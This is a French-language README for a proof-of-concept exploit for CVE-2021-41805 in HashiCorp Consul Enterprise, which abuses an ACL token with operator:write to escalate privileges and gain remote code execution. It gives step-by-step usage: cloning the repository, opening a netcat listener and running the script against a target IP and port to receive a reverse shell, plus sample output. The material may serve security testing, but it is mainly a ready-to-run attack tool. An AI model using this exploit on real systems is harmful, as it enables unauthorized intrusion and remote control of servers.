
Une preuve de concept pour CVE-2021-41805 qui est une vulnérabilité dans HashiCorp Consul Enterprise permettant une exécution de code à distance (RCE) avec des privilèges élevés.
[!WARNING] AVIS JURIDIQUE : Cet outil est STRICTEMENT réservé à des FINS ÉDUCATIVES UNIQUEMENT ! L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est ILLÉGALE. Il est de la responsabilité de l'utilisateur de respecter toutes les lois en vigueur lors de l'utilisation de cet outil. Le développeur de cet outil décline toute responsabilité et n'est pas responsable de toute mauvaise utilisation ou de tout dommage causé par ce programme.
Un jeton ACL (avec les permissions operator:write par défaut) dans un espace de noms peut être utilisé pour une escalade de privilèges non intentionnelle dans un autre espace de noms. Cela peut être exploité pour obtenir une exécution de code à distance (RCE) avec des privilèges élevés.
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <PORT_ECOUTEUR>python3 CVE-2021-41805.py -r <IP_CIBLE> -rp <PORT_CIBLE> -l <IP_ECOUTEUR> -lp <PORT_ECOUTEUR> [OPTIONNEL : -t <jeton ACL> -v (verbeux) -s (utiliser SSL)]
L'exécution de l'exploit avec les arguments de base : -r [IP_CIBLE], -rp [PORT_CIBLE], -l [IP_ECOUTEUR], -lp [PORT_ECOUTEUR] (-t [JETON_ACL], -s [Utiliser SSL]) produira une sortie simple comme :
[*] La requête PUT a été effectuée avec succès. Vérifiez votre écouteur...
L'exécution de l'exploit avec les arguments de base plus -v [VERBEUX] donnera une sortie détaillée :

Si une erreur se produit lors de l'exécution de l'exploit et que l'argument -v est spécifié, la sortie ressemblera à :
